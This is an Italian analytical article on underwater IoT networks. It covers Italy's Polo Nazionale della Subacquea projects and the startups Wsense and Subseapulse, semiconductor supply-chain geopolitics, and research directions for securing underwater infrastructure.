Underwater IoT (IoUT). Sfide geopolitiche, innovazioni tecnologiche e direzioni future dell’ecosistema nazionale
“The rise of competing modernities heralds a quite new world in which no hemisphere or country will have the same kind of prestige, legitimacy or overwhelming force that the West has enjoyed over the last two centuries. Instead different countries and cultures will compete for legitimacy and influence. The new world, at least for the next century, will not be Chinese in the way that the previous one was Western. We are entering an era of competing modernity, albeit one in which China will increasingly be in the ascendant and eventually perhaps dominant” (Jacques, 2012).
Introduzione
Nonostante gli oceani rappresentino il 71% della Terra, meno del 20% dei fondali è stato mappato con risoluzioni paragonabili a quelle disponibili per la superficie lunare.
Questo paradosso tecnologico deriva dalle sfide estreme dell’ambiente sottomarino: pressioni elevate, assenza di luce, complessità nelle comunicazioni e nella navigazione di precisione sicura, specie se effettuata senza soluzione di continuità. Progetti moderni come il Seabed 2030 puntano a colmare questa lacuna entro il 2030, attraverso sonar multibeam e veicoli autonomi; ma il cammino verso una comprensione completa degli ecosistemi abissali resta ancora lungo e affascinante.
Il progetto Seabed 2030 è un’iniziativa collaborativa, assai ambiziosa, lanciata nel 2017 dalla Nippon Foundation e General Bathymetric Chart of the Oceans (GEBCO) con l’obiettivo di mappare completamente il fondale oceanico globale entro il 2030. A tutt’oggi, circa il 25% del fondale oceanico è stato mappato con un risultato notevole, presentato nel febbraio 2025, quando è stata rilasciata una mappa dettagliata di una vasta porzione dell’Oceano Artico, aggiungendo 1,4 milioni di km² di copertura mappata [1].
I dati da raccogliere sono cruciali per la navigazione sicura, l’esplorazione oceanica, la gestione sostenibile degli oceani e la ricerca scientifica. In questo quadro generale si inserisce, nondimeno, anche la questione – sicuramente non secondaria – della sicurezza delle infrastrutture marine e dello sviluppo degli oggetti definibili come Smart Ocean Technologies (SOT). Il continuo sviluppo delle tecnologie di Internet of Things subacquee (Internet of Underwater Things, IoUT) pone anche un problema di intelligence delle minacce informatiche (Cyber Threat Intelligence o CTI), la quale si occupa di assicurare la protezione dei cavi sottomarini e di altre infrastrutture critiche, quali quelle energetiche.
Ciò a maggior ragione se si considera che la lunghezza complessiva delle coste italiane è di circa 8.300 km [2]: questa estensione costiera rende l’Italia uno dei paesi con il maggior sviluppo marittimo in Europa, grazie alla sua conformazione geografica di penisola e alla presenza di numerose isole. L’integrazione del ciclo di vita della CTI negli ecosistemi IoUT, tuttavia, richiede adattamenti specifici per affrontare le sfide uniche degli ambienti subacquei, come latenza elevata, larghezza di banda limitata, vincoli energetici e comunicazione acustica.
Una definizione generale di IoUT è la seguente: “a world-wide network of smart interconnected underwater objects that enables to monitor vast unexplored water areas” (Pascual et al., 2011). In altri termini, un vastissimo mondo celato sotto le onde marine, dove la tecnologia si fonde con l’ambiente marino in un movimento silenzioso di dati e correnti.
Grazie alla combinazione di Internet, tecnologie avanzate di tracciamento e sensori integrati, questi dispositivi sono divenuti veri e propri “artefatti digitali” capaci di percepire, interpretare e interagire con l’ambiente circostante. Non solo monitorano il mondo subacqueo ma creano un ponte tra le “cose” sommerse e quelle terrestri, fermo restando che, qualora le informazioni non viaggino tramite fibre o cavi e siano quindi wireless, le bande passanti e le distanze raggiungibili sono molto inferiori a quanto accade in aria o nello spazio; ciò, con varie modalità applicative, vale sia per le onde acustiche sia per quelle elettromagnetiche.
In buona sostanza, questa rete intelligente semplifica radicalmente la gestione degli habitat marini e delle risorse subacquee: dalla manutenzione delle infrastrutture critiche alla protezione degli ecosistemi, tutto diventa più intuitivo ed efficiente, aprendo la strada a un futuro in cui il mondo sommerso sarà completamente connesso e accessibile (Domingo 2012). Questo breve testo analizza le basi architetturali delle IoUT, valuta i principali aspetti di vulnerabilità e propone alcune riflessioni generali sulla sovranità tecnologica della Nazione, relative agli ambienti sottomarini.
Elementi di architettura Underwater IoT (IoUT)
A differenza dell’IoT terrestre, che si basa sulle frequenze radio, i sistemi IoUT utilizzano principalmente le onde acustiche per la trasmissione dei dati, raggiungendo profondità fino a 3.000 metri nonostante le sfide di latenza.
Le reti mesh multi-hop [3] sono una tipologia avanzata di rete wireless che offre numerosi vantaggi rispetto alle reti Wi-Fi tradizionali: queste reti sfruttano nodi interconnessi che collaborano per trasmettere informazioni in ambienti subacquei complessi, garantendo copertura, resilienza ed efficienza energetica. I nodi formano un’estesa maglia wireless in cui i dati “saltano” da un dispositivo all’altro fino a raggiungere un gateway.
Questo approccio multi-hop elimina la dipendenza da connessioni dirette, garantendo copertura su aree estese (fino a 50 km²) senza cavi. I nodi sono formati da dispositivi autonomi dotati di sensori (temperatura, salinità, pressione) e modem acustici/ottici per la comunicazione. Essi possono essere fissi (ancorati al fondale) o mobili (montati su sottomarini autonomi (Autonomous Underwater Vehicle, AUV) o droni). I gateway di superficie sono ponti radio-acustici che collegano la rete subacquea a server cloud o satelliti, abilitando l’integrazione con sistemi terrestri.
In definitiva, quest’architettura supporta l’interoperabilità tra sensori, AUV e boe di superficie, consentendo il monitoraggio in tempo reale di parametri come temperatura, salinità e rumore subacqueo.
In ambito nazionale vi sono almeno due aziende con un forte potenziale innovativo in questo specifico settore: Wsense e Subseapulse. Entrambe sono spin-off universitari, rispettivamente della Sapienza di Roma e dell’Università di Padova.
La prima persegue un modello tendenzialmente più verticale e proprietario, orientato al soddisfacimento dei requisiti del cliente tramite soluzioni ad hoc in termini sia di prodotti sia di servizi. La seconda, forse più coerentemente con le proprie origini universitarie, prevede un approccio open source e l’esame insieme al cliente dei requisiti, seguito dalla gestione e sviluppo congiunto di prodotti e servizi.
Nel seguito – anche in ragione della stretta collaborazione con Fincantieri e dei successi ottenuti nell’ambito dei bandi del Polo Nazionale della Subacquea (di cui al prossimo paragrafo) – si concentra l’attenzione su Wsense, pur ritenendo che le altre realtà nazionali di settore possano esibire capacità non inferiori, o quantomeno paragonabili.
La visione della start-up romana, come si vede dall’immagine sopra riprodotta, prevede 4 elementi distintivi: wCloud; wMesh; wNode e wGateway.
Il wCloud rappresenta il livello applicativo personalizzabile che consente la visualizzazione dei dati raccolti tramite API aperte e permette delle analisi in tempo reale mediante la presentazione dei dati attraverso interfacce web, inclusa la visualizzazione 3D per scenari complessi.
Il wMesh (device software) è un sistema brevettato che consente la trasmissione di dati wireless tra nodi subacquei attraverso reti mesh multi-hop. Questo sistema supporta l’integrazione di sensori e dispositivi di diversi produttori, garantendo una comunicazione fluida tra piattaforme sommerse e di superficie, facendo uso di protocolli crittografici leggeri per minimizzare il consumo energetico, offrendo autenticazione, gestione delle chiavi e integrità dei dati.
I wNode e wGateway (device hardware) sono dei sensori subacquei dotati di modem acustici per monitorare parametri ambientali (qualità dell’acqua, correnti, suoni) in tempo reale.
In definitiva, un obiettivo precipuo delle start-up italiane è continuare lo sviluppo di tecnologie per conseguire e consolidare un proprio ruolo nella standardizzazione delle comunicazioni subacquee a livello globale, anche per lavorare a profondità superiori a 3.000 metri.
Ciò consentirebbe la disponibilità, per l’ecosistema Italia, della capacità di operare in quasi tutte le aree di interesse, compresi gli strati più profondi, contribuendo non solo alla protezione delle infrastrutture critiche nazionali ma anche all’ulteriore sviluppo della Blue economy italiana e globale.
Polo nazionale della dimensione subacquea (PNS)
Se WSense e Subseapulse sono un valido esempio delle capacità nazionali in questo settore, non si può sottacere che vi è un più diffuso ecosistema industriale in pieno sviluppo che fa il paio con quello spaziale, di cui si è trattato in un precedente articolo (Paliotta & Sgobbi 2024).
Il Polo Nazionale Subacqueo (PNS) rappresenta un’iniziativa strategica per il sistema Paese, nata con l’obiettivo di promuovere la sovranità tecnologica e la competitività dell’Italia nel settore subacqueo [4], che si può già considerare un nuovo dominio, in aggiunta ai 5 già noti in ambito militare (terra, mare, aria, cyber e spazio). Il PNS si avvia a divenire, di fatto, un centro di eccellenza per la ricerca tecnico-scientifica e lo sviluppo di tecnologie innovative legate all’ambiente marino.
Il PNS si propone di sviluppare conoscenze multidimensionali sul mondo subacqueo, con particolare attenzione alla protezione delle infrastrutture critiche nazionali (come cavi e oleodotti) e alla sostenibilità ambientale. Allo stesso tempo, ha l’obiettivo di individuare e colmare – per quanto possibile – il gap tecnologico con i paesi più avanzati, favorendo una competitività industriale che coinvolga grandi aziende, PMI, università e centri di ricerca. In questa maniera si cerca di favorire lo sviluppo di un ecosistema virtuoso, capace di attirare investimenti pubblici e privati, generando occupazione e ricadute economiche su settori produttivi limitrofi.
L’obiettivo precipuo del Governo italiano è, pertanto, promuovere la sovranità tecnologica della Nazione, riducendo la dipendenza da soluzioni estere per tecnologie critiche come cavi in fibra ottica, modem acustici criptati e veicoli autonomi subacquei (UUV).
Attualmente il PNS ha avviato diversi progetti nazionali, tramite la pubblicazione di diversi bandi tecnico-scientifici finalizzati allo sviluppo del settore subacqueo, che coinvolgono PMI, grandi industrie, università e investitori privati.
Tra i progetti più rilevanti e interessanti già selezionati, vale qui indicare brevemente i seguenti [5]:
Il progetto “OPTIMUS – Energy OPTImization Maritime Unmanned Systems” si concentra sullo studio e sull’ottimizzazione della gestione dell’energia per i sistemi subacquei autonomi [6]; prime contractor Wsense.
Il progetto SIMILARS propone lo sviluppo di soluzioni modulari di lancio e recupero per Maritime Uncrewed Systems (MUS): sviluppare quindi un sistema avanzato di lancio e recupero per veicoli autonomi subacquei che integri tecnologie innovative per automatizzare e migliorare la sicurezza, l’efficienza e la produttività delle operazioni subacquee. Il sistema proposto mira a stabilire nuovi standard in termini di interoperabilità, modularità e sicurezza operativa, adattandosi sia a contesti militari che civili; prime contractor Fincantieri.
Il progetto MURENA ha l’obiettivo di studiare, sviluppare, implementare e testare soluzioni in grado di aumentare la situational awareness nel dominio underwater. È previsto lo sviluppo di algoritmi per consentire capacità di scoperta acustica multi-statica tramite un insieme di piattaforme cooperanti, sfruttando sia emissioni attive proprie che sorgenti acustiche di opportunità; prime contractor Leonardo.
Il progetto TARAS si concentra sullo studio e sullo sviluppo di un’infrastruttura di rete subacquea, che tenga conto dei requisiti di sicurezza informatica by design. Progettare e sviluppare un’infrastruttura di rete subacquea ibrida (cablata e wireless), con capacità di trasmissione wireless multimodale (ottica e acustica), che abiliti un sistema di comunicazione cross-domain (marino e terrestre). I nodi, i sensori e i veicoli subacquei senza equipaggio saranno progettati per consentire lo scambio di dati attraverso una rete ibrida affidabile con un centro di comando e controllo (C2) e supportare scopi militari come la guerra antisommergibile (ASW) e le infrastrutture critiche subacquee (CUI), nonché scopi civili; prime contractor Wsense.
Navigazione di precisione subacquea (PNS-2024-R-05) [7]. Studio e sviluppo di tecnologie innovative per migliorare la navigazione in ambienti sottomarini complessi; prime contractor GEM Elettronica.
Cavi subacquei intelligenti (PNS-2024-R-06) [8]. Progettazione di sistemi avanzati per il monitoraggio continuo delle dorsali marine; prime contractor Wsense.
Manipolatori modulari per UUV (PNS-2024-R-07) [9]. Realizzazione di payload multifunzione per veicoli autonomi subacquei; prime contractor Saipem.
Batterie abissali ad alte prestazioni (PNS-2024-R-08) [10]. Sviluppo di soluzioni energetiche avanzate per operazioni a grandi profondità; prime contractor Whitehead Alenia Sistemi Subacquei.
Ogni progetto avrà una durata massima di 24 mesi e sarà cofinanziato al 50%, con priorità a consorzi tra aziende pubbliche e private italiane.
Tra le infrastrutture strategiche in fase di sviluppo si possono menzionare le reti subacquee intelligenti, costituite da sistemi integrati che combinano comunicazioni acustiche criptate con sensori avanzati per il monitoraggio ambientale.
Vale qui citare anche le Docking station autonome, strutture modulari per ricaricare e coordinare UUV; nonché un veicolo autonomo altamente performante, progettato con componentistica italiana, chiamato Flat Fish. Si tratta di un innovativo UUV progettato per ispezioni avanzate e monitoraggio di infrastrutture sottomarine. Sviluppato inizialmente da Shell Brasile, Senai Cimac e il German Research Center for Artificial Intelligence (DFKI), nel 2018 Saipem ha acquisito la licenza per sviluppare ulteriormente FlatFish, integrandolo nel proprio programma Hydrone, integrando ulteriori funzionalità avanzate per la sua applicazione commerciale.
Tuttavia, nonostante l’importanza strategica del PNS, le risorse attualmente disponibili sono limitate rispetto alle ambizioni dei progetti prospettati. Secondo le stime dell’Associazione Industrie Aerospaziali Difesa (AIAD), sarebbero necessari almeno 50 milioni di euro all’anno per dieci anni (500 milioni totali) per garantire al PNS una leadership internazionale nel settore.
L’ultimo bando del PNS, pubblicato il 28 maggio 2025 – sebbene un’analisi dettagliata dello stesso non possa essere svolta in questa sede – sembra contenere elementi innovativi in termini di politica industriale; dà ulteriore spazio al ruolo delle PMI e il PNS si apre anche a suggerimenti unsolicited, ovvero proposti in autonomia – sebbene in aderenza a delle indicazioni molto generali – da chi risponderà al bando, per un’innovazione tecnologica del settore che risulti la più ampia possibile. Tuttavia, il finanziamento complessivamente messo a disposizione dell’ecosistema industriale che si vuole creare non supera i 20 milioni di euro.
Infine, rimane forte la promozione della sovranità tecnologica di cui si è fatto cenno. Essa viene perseguita con determinazione dal PNS, che non consente la partecipazione diretta ai bandi di società proponenti che siano valutate come soggette a controllo estero; queste ultime possono essere coinvolte solo in qualità di subfornitori e acconsentendo a specifiche condizioni che regolino i diritti di proprietà intellettuale.
Benché non si possa che guardare con simpatia a questa volontà di accrescere le capacità nazionali, si impongono due considerazioni:
il confronto con il settore spaziale (Paliotta & Sgobbi 2024), non meno strategico, fa emergere un approccio completamente diverso; il grosso delle capacità manifatturiere nazionali, in cui si investono e si sono investite somme molto più considerevoli di quelle previste e prevedibili per il settore della subacquea, è a controllo francese (e.g. Thalesaleniaspace Italia) o con forte partecipazione francese (e.g. Telespazio);
la sovranità tecnologica e l’autonomia strategica sono fortemente correlate alla supply chain che supporta l’economia nazionale e alle realistiche possibilità che quest’ultima – in termini di sovranità e autonomia – rende possibili. Appare quindi necessaria un’accurata analisi di questo fattore per concepire al meglio le politiche industriali e di investimento. A mero titolo esemplificativo ne consegue che, quando la struttura della supply chain non rende perseguibili gli obiettivi di sovranità tecnologica e di autonomia strategica, può essere utile od opportuna l’esclusione sistematica di società che possono essere considerate a controllo estero.
Geopolitica e ruolo strategico delle catene di approvvigionamento
Sebbene il PNS rappresenti un tentativo significativo di sviluppo della sicurezza nazionale e della correlata sovranità digitale, un’analisi critica deve mettere in evidenza una serie di pregresse occasioni mancate e carenze strategiche, tanto a livello nazionale quanto europeo.
Non si può negare, infatti, che tra le superpotenze infuria una guerra globale per la supremazia tecnologica, in particolare nell’Indo-Pacifico e in parte anche nell’Atlantico, minacciando le fondamenta dell’ordine civile internazionale; quest’ultimo “terremotato”, oggigiorno, anche dalla guerra dei dazi scatenata dal presidente statunitense Donald Trump. Nondimeno, l’impatto globale si avrebbe non solo a livello economico ma anche culturale e politico, portando a un futuro di “competing modernities” (Jacques 2011), peraltro già prefigurato dall’asserito “declino” dell’Occidente e dal “rise of the rest” (Zakaria 2008).
Come già messo in evidenza in articoli precedenti (Paliotta & Sgobbi 2025), non si può non rimarcare, a solo titolo esemplificativo, la dipendenza dai semiconduttori stranieri, da parte dell’Italia e dell’Unione Europea, la quale costituisce una vulnerabilità critica che non può essere adeguatamente affrontata e risolta solo a livello nazionale.
A questo riguardo le restrizioni sulle esportazioni di tecnologie avanzate, relative allo “US Chips and Science Act” (Creating Helpful Incentives to Produce Semiconductors – CHIPS) [11], pongono sfide significative per le ambizioni italiane ed europee, nonostante la stessa UE abbia promulgato un atto legislativo simile, con lo stesso nome [12].
Nel caso del CHIPS, si tratta di una legge che mira a promuovere la produzione di semiconduttori con un investimento di 13 miliardi di dollari, con l’obiettivo di rafforzare la catena di approvvigionamento statunitense e, allo stesso tempo, la resilienza e la competizione geopolitica con la Repubblica popolare cinese (RPC). Questi chip sono essenziali per produrre nuove generazioni di IA avanzata, nonché per le telecomunicazioni 5G e 6G, applicazioni sempre più vitali per la sicurezza nazionale e la competitività economica.
Dell’importanza del ruolo rivestito dai semiconduttori, del resto, si era già avuta riprova durante la pandemia di Covid-19. In quel tempo, sia l’economia degli Stati Uniti che dell’UE erano state fortemente scompaginate dalla carenza di questi prodotti dovuta alle impennate inaspettate della domanda di chip (es. per dispositivi elettronici), portando anche a una notevole riduzione della produzione automobilistica.
Nel controllare la catena di approvvigionamento dei chip gli Stati Uniti potrebbero imporre, di fatto, una limitazione della potenza di calcolo computazionale agli altri paesi attraverso gli export controls, utilizzata dunque alla stregua di una decisiva leva strategica in grado di plasmare la diffusione globale delle nuove tecnologie e dell’IA in primis. Ciò potrebbe rappresentare un allontanamento dal sistema unipolare dominato dagli Stati Uniti e portare all’esistenza di due/tre ecosistemi digitali paralleli, gestiti dalla RPC, dalla Federazione Russa e dagli Stati Uniti. Di conseguenza, sia l’Italia che l’UE si troverebbero necessariamente costrette ad allineare i loro ecosistemi tecnologici a quelli degli Stati Uniti, in un processo che è stato già etichettato come ri-globalizzazione e de-risking.
La diffusione globale ristretta della potenza computazionale potrebbe essere modellata sull’attuale “guerra” dei dazi, in cui verrebbero concesse facilitazioni e privilegi maggiori a quei Paesi che decidessero di attivare una forte partnership/subordinazione con l’alleato statunitense, quali la cooperazione militare e garanzie legate alla sicurezza nazionale. Tali garanzie includerebbero standard cogenti di cybersecurity, protocolli di sicurezza fisica relativi alla supply chain, monitoraggio delle possibili insider threats; tutti elementi utilizzati per prevenire l’accesso non autorizzato, l’interferenza e il sabotaggio degli attori statuali avversari, ecc.
In termini di rilevanza geopolitica, in aggiunta a quanto esposto, assumono importanza sia la capacità di finanziare gli investimenti necessari – cui s’è già fatto cenno in precedenza parlando del PNS – sia la disponibilità di fonti energetiche, specie nella prospettiva di realizzare importanti infrastrutture abissali, non sempre e non facilmente alimentabili da terra. In quest’ultimo caso, l’Italia dovrebbe considerare attentamente il ruolo, ormai non più differibile, dei piccoli reattori modulari nucleari come fonte di energia.
Sfide di cybersecurity in ambiente subacqueo. Alcune direzioni di ricerca future
In questo breve testo non si può non citare, seppur a brevissime linee, l’aspetto che riguarda la cybersecurity e l’intelligenza artificiale. Vale qui mettere in evidenza che, pur non volendo sottacere della loro importanza, le problematiche, dal punto di vista tecnico, non sono così significativamente differenti da quelle riscontrabili in altri ecosistemi IoT e infrastrutture critiche (Paliotta 2024); se non fosse che la dimensione subacquea esaspera alcuni loro aspetti, considerata le peculiarità di tale ambiente.
Si ripercorrono allora, in questa sede, solo alcuni aspetti che agli autori paiono rappresentare delle direzioni di ricerca futura su cui continuare a sperimentare attività e modelli.
La prima direzione di ricerca può essere considerata la crittografia post-quantistica progettata per resistere agli attacchi dei computer quantistici. La sua integrazione in canali acustici subacquei è particolarmente rilevante per proteggere le comunicazioni nelle reti IoUT: alcuni studi (Huang et al. 2019) hanno mostrato che implementazioni non protette sono vulnerabili ad attacchi CPA (correlation power analysis) e template attacks, con recupero completo della chiave privata da una singola traccia di consumo energetico. Le contromisure ipotizzate possono andare dall’incapsulamento dei nodi in materiali anti-tampering (es. titanio) per mitigare l’acquisizione di segnali elettromagnetici, all’introduzione di rumore algoritmico durante le moltiplicazioni polinomiali per neutralizzare le analisi statistiche.
Una seconda direzione di ricerca sono i prototipi sviluppati nel progetto CyberSEAS (https://cyberseas.eu/about/), finanziato dall’UE, i quali integrano funzionalità di apprendimento federato (FL) per abilitare l’analisi collaborativa di malware tra flotte sottomarine, preservando la privacy e senza richiedere il pooling centralizzato dei dati.
Quest’architettura innovativa affronta le sfide critiche della cybersecurity in ambienti subacquei, dove la connettività limitata e la sensibilità dei dati rendono non semplici gli approcci tradizionali. Il framework FL di CyberSEAS è stato esteso al progetto UnderSec al fine di analizzare dati multimodali (idrofoni, sonar, immagini ottiche) in tempo reale e di condividere firme di attacchi avanzati (es. jamming a frequenza variabile) tra flotte NATO ed EU. In questo modo, si riesce anche a supportare decisioni di risposta autonome (es. isolamento di nodi compromessi) tramite policy predefinite [13].
Un terzo aspetto che può essere qui brevemente riportato è relativo al framework da utilizzare nel ciclo di vita della CTI, vale a dire l’implementazione di STIX/TAXII. L’utilizzo di tale standard STIX (Structured Threat Information Expression) e del protocollo TAXII (Trusted Automated Exchange of Intelligence Information) in ambienti IoUT richiede soluzioni innovative per superare i vincoli energetici, di banda e latenza tipici delle comunicazioni subacquee. Il progetto ARCADIAN-IoT, citato nella letteratura recente [14], dimostra come l’adattamento “TinySTIX” abiliti l’analisi e lo scambio di CTI in scenari estremi, mantenendo la conformità agli standard globali.
A questo riguardo, TinySTIX potrebbe rappresentare un passo significativo verso ecosistemi IoUT sicuri e scalabili, abilitando una cyber defence autonoma in ambienti dove risorse computazionali e connettività sono vincoli primari. La combinazione di Concise Binary Object Representation (CBOR), crittografia post-quantistica e integrazione con protocolli ottimizzati aprirebbe la strada a standard globali per la CTI subacquea.
Benché, come precisato in precedenza, la cybersecurity debba essere applicata in piena analogia a quanto si fa in ambito ICT (Paliotta & Sgobbi 2025), sarà probabilmente necessario porre particolare attenzione nel fondere le competenze cyber e della subacquea, tramite adeguati investimenti che “cross-fertilizzino” l’ecosistema della subacquea con le competenze e la cultura correlate alla cybersecurity.
Conclusione
La costante e progressiva maturazione delle infrastrutture IoUT, grazie anche allo sviluppo del Polo Nazionale Subacqueo (PNS), richiede l’implementazione di framework di Cyber Threat Intelligence (CTI) altrettanto avanzati, in grado di tenere conto delle peculiarità fisiche della propagazione acustica, dei vincoli energetici e delle minacce geopolitiche che gravano sulle attività sottomarine. Ciò a maggior ragione oggigiorno, a seguito dell’attuale congiuntura globale con le ipotesi di riarmo europeo.
L’integrazione di sistemi di intelligence adattiva direttamente nei protocolli delle reti mesh multi-hop, combinata con l’impiego dell’IA per la difesa predittiva, rappresenta un passo cruciale per garantire la sicurezza delle infrastrutture critiche subacquee nazionali e, al contempo, promuovere gli obiettivi socio-economici relativi all’economia blu. Quest’ultimo aspetto non è infatti secondario e merita tutta l’attenzione che un ministro ad hoc (Ministro per la Protezione Civile e le Politiche del Mare, Nello Musumeci) e l’attuale Esecutivo vi ha voluto porre, consapevole della sua rilevanza strategica in un paese, peraltro, connotato da più di 8.300 km di coste.
Il futuro sviluppo della cybersicurezza del settore subacqueo dovrà prioritizzare anche l’adozione di architetture sicure basate su tecnologie post-quantistiche, capaci di resistere agli attacchi informatici emergenti. Inoltre, sarà essenziale favorire una collaborazione europea e internazionale nel campo della CTI per affrontare i rischi complessi e interconnessi che caratterizzano questa nuova frontiera tecnologica. Solo attraverso un approccio integrato e cooperativo sarà possibile mitigare le minacce e garantire la resilienza delle reti IoUT in un contesto geopolitico sempre più dinamico e sfidante.
Il PNS costituisce un impegno rilevante per rafforzare la sicurezza nazionale e la sovranità digitale della Nazione (es. Piano del Mare e Agenzia per la Sicurezza delle Attività Subacquee, ASAS). Tuttavia, un esame critico ha messo in evidenza che la sua azione non è facilitata da pregresse lacune strategiche e da opportunità non sfruttate dovute al disimpegno di decenni passati, sia a livello nazionale che nel più ampio contesto europeo; tale stato di cose rischia di limitare l’efficacia complessiva del PNS, nonostante il notevole lavoro fatto.
La correlazione tra sovranità tecnologica, autonomia strategica e struttura delle supply chain, infatti, costituisce un elemento centrale per la sicurezza economica e geopolitica. L’efficacia delle politiche industriali italiane dipenderà, di conseguenza, dalla capacità di garantire catene di approvvigionamento resilienti, riducendo le dipendenze critiche da attori esteri considerati non affidabili.
In definitiva il successo nazionale nell’ambito delle attività subacquee, che non dipende certo solo dal PNS ma anche dal superiore livello di governance, sarà determinato da come si riuscirà a far fronte a tutti questi aspetti dirimenti, i quali costituiscono dei veri e propri “colli di bottiglia” che restano a tutt’oggi, purtroppo, problemi ereditati, di non facile – ma indispensabile – risoluzione.
Scopri di più consultando il white paper “Quaderni di Cyber Intelligence #8”, dove troverai analisi avanzate, case study e prospettive strategiche dedicate alle infrastrutture critiche, alla geopolitica digitale e alla governance della dimensione subacquea.
Riferimenti bibliografici
Domingo MC. (2012), An overview of the internet of underwater things, “Journal of Network and Computer Applications”, 35, 1879-1890
Huang WL., Chen JP. & Yang BY. (2019), Power analysis on NTRU Prime, “IACR Transactions on Cryptographic Hardware and Embedded Systems”, v. 2020, n. 1, 123-151
Jacques Martin (2012), When China Rules the World. The Rise of the Middle Kingdom and the End of the Western World, Penguin (London)
Pascual, Sanjuan O., Cueva JM., Pelayo BC, Alvarez M., Gonzalez A. (2011), Modeling architecture for collaborative virtual objects based on services, “Journal of Network and Computer Applications”; 34 (5), pp. 1634-47
Vijay MM., Sunil J., Anisha Gnana Vincy VG., IjazKhan, Sherzod Shukhratovich Abdullaev, Eldin SM., Govindan V., Ahmad & Askar S. (2023), Underwater wireless sensor network-based multihop data transmission using hybrid cat cheetah optimization algorithm, Scientific Reports, 13:10810, pp. 16
Zakaria (2008), The Post-American World, W. W. Norton (New York)
[3] Una rete mesh multi-hop è un tipo di rete wireless in cui i dati viaggiano tra i dispositivi attraverso più nodi intermedi, o “hop”, per raggiungere la destinazione. A differenza di una rete a singolo hop, in cui i dati viaggiano direttamente tra due dispositivi, le reti multi-hop sono comunemente utilizzate in applicazioni come le reti di sensori wireless, le reti mesh wireless e le reti mobili ad hoc in cui le aree di copertura sono ampie o le infrastrutture sono limitate.
[4] Cfr. Decreto Legislativo 15 marzo 2010, n. 66 (Codice dell’ordinamento militare). “La Marina militare promuove le attività per la valorizzazione delle potenzialità e della competitività del settore della subacquea nazionale, per la promozione delle connesse attività di ricerca e tecnico-scientifiche nonché per il potenziamento delle innovazioni e della relativa proprietà intellettuale.
A tale fine, con decreto del Ministro della Difesa, di concerto con i Ministri delle Imprese e del Made in Italy e dell’Università e della Ricerca, è istituito e disciplinato il Polo Nazionale della Subacquea”, art. 111, comma 1 bis. “L’Italia intende istituire il Polo Nazionale della Subacquea, per dotarsi di un catalizzatore e acceleratore tecnologico, aggregando tutte le realtà pertinenti (istituzioni, mondo accademico, della ricerca e industriale)”.
Delibera PCM 31 luglio 2023, Approvazione del Piano del mare per il triennio 2023-2025, cfr. https://www.gazzettaufficiale.it/eli/id/2023/10/23/23A05758/sg. Il 27 settembre 2024 il Consiglio dei ministri, su proposta del Presidente Giorgia Meloni e del Ministro per la Protezione Civile e le Politiche del Mare, Nello Musumeci, ha approvato un Disegno di legge in materia di sicurezza delle attività sottomarine istituendo l’ASAS, l’Agenzia per la Sicurezza delle Attività Subacquee.
[6] Attraverso lo studio e lo sviluppo di modalità operative a basso consumo per veicoli senza pilota, si mira a garantire un efficace sfruttamento dei carichi utili di bordo. Il progetto si concentra sulla realizzazione di quattro dimostratori tecnologici: un sistema di propulsione che sfrutta l’energia del moto ondoso, un sistema di recupero dell’energia inerziale tramite masse mobili, magneti permanenti e bobine, un sistema di generazione di energia mediante celle a combustibile microbiche, e un veicolo di superficie autonomo con propulsione assistita dal vento e capacità di gateway. Cfr. https://www.difesa.it/assets/allegati/52769/240711_51_optimus.pdf.pdf
[7] Risultati attesi: 1) Studio e realizzazione di un sistema di navigazione inerziale (TRL 5) a bassa deriva (basati, ad esempio, su Fiber Optic Gyro, sensori quantistici, ecc.) imbarcabile su UUV di piccole dimensioni; 2) Studio, sviluppo, realizzazione di un dimostratore tecnologico del sistema di navigazione preciso (TRL 7), installabile su piattaforme autonome subacquee di piccole dimensioni, e dimostrazione mediante l’impiego di sistemi autonomi in ambiente rilevante. Cfr. https://www.marina.difesa.it/documentazione/gare/PNS/Documents/PNS%20-%20Bando%20progetti%20batch%202%20con%20annessi.pdf
[8] Risultati attesi: 1) Sviluppo di un sistema di monitoraggio di dati ambientali e di rivelazione di contatti mediante sensoristica ed algoritmi applicati a cavi subacquei di comunicazione in fibra ottica esistenti o di prossima realizzazione; 2) Sviluppo, eventualmente anche attraverso l’adattamento di soluzioni esistenti o di prossimo dispiegamento, di nodi dedicati alla sensoristica e al sistema di monitoraggio e rivelazione di contatti; 3) Predisposizione per lo scambio di dati con UUV in modalità wireless e contactless (anche per la funzione di ricarica); 4) Produzione di documentazione tecnica dettagliata sull’integrazione della sensoristica, sulla processazione dei dati e sul sistema di condivisione delle informazioni raccolte; 5) Dimostrazione del sistema in ambiente reale, eventualmente in scala, o simulato. Cfr. ivi.
[9] Risultati attesi: 1) Realizzazione di un dimostratore e integrazione del payload su un UUV di piccole/medie dimensioni; 2) Realizzazione di un sistema di compensazione del manipolatore; 3) Realizzazione di un modello digital twin per il sistema di manipolazione; 4) Dimostrazione del sistema in ambiente simulato; 5) Dimostrazione in mare (indicativamente 500 m di profondità); 6) Report della sperimentazione e documentazione tecnica completa. Cfr. ivi.
[10] Risultati attesi: 1) Realizzazione e sviluppo di una batteria (es. pressure tolerant) in grado di essere equipaggiata a bordo di veicoli autonomi eterogenei e possa essere facilmente sostituita durante le operazioni in mare; 2) Report dettagliato sui test e sulle performance delle batterie; 3) Documento tecnico sulle soluzioni innovative adottate con un confronto tra le soluzioni resistant (contenitore stagno resistente alla pressione idrostatica) e tolerant (senza contenitore stagno). Cfr. ivi.
[11] Il presidente Trump ha espresso dei dubbi sul funzionamento di tale legge, approvata in maniera bipartisan dal Congresso e firmata dall’allora presidente Joe Biden il 9 agosto 2022. “And just yesterday, Taiwan Semiconductor – the biggest in the world, most powerful in the world, has a tremendous amount – 97 percent of the market, announced a $165 billion investment to build the most powerful chips on Earth right here in the USA. (…) And we’re not giving them any money. Your CHIPS Act is a horrible, horrible thing.
“The CHIPS Act has brought enormous investment into the US from top semiconductor firms around the world, bringing US manufacturing capabilities closer to the cutting edge and improving US national security. Even after stripping out post-2019 inflation, the CHIPS Act spurred an estimated over $110 billion in 2019 dollars of investment in the US (…). While the US dominates much of the chip supply chain, by 2020 it held a small and shrinking share of semiconductor fabrication, with no production of advanced chips on American soil.”, cfr. https://www.piie.com/blogs/realtime-economics/2025/chips-act-already-puts-america-first-scrapping-it-would-poison-well
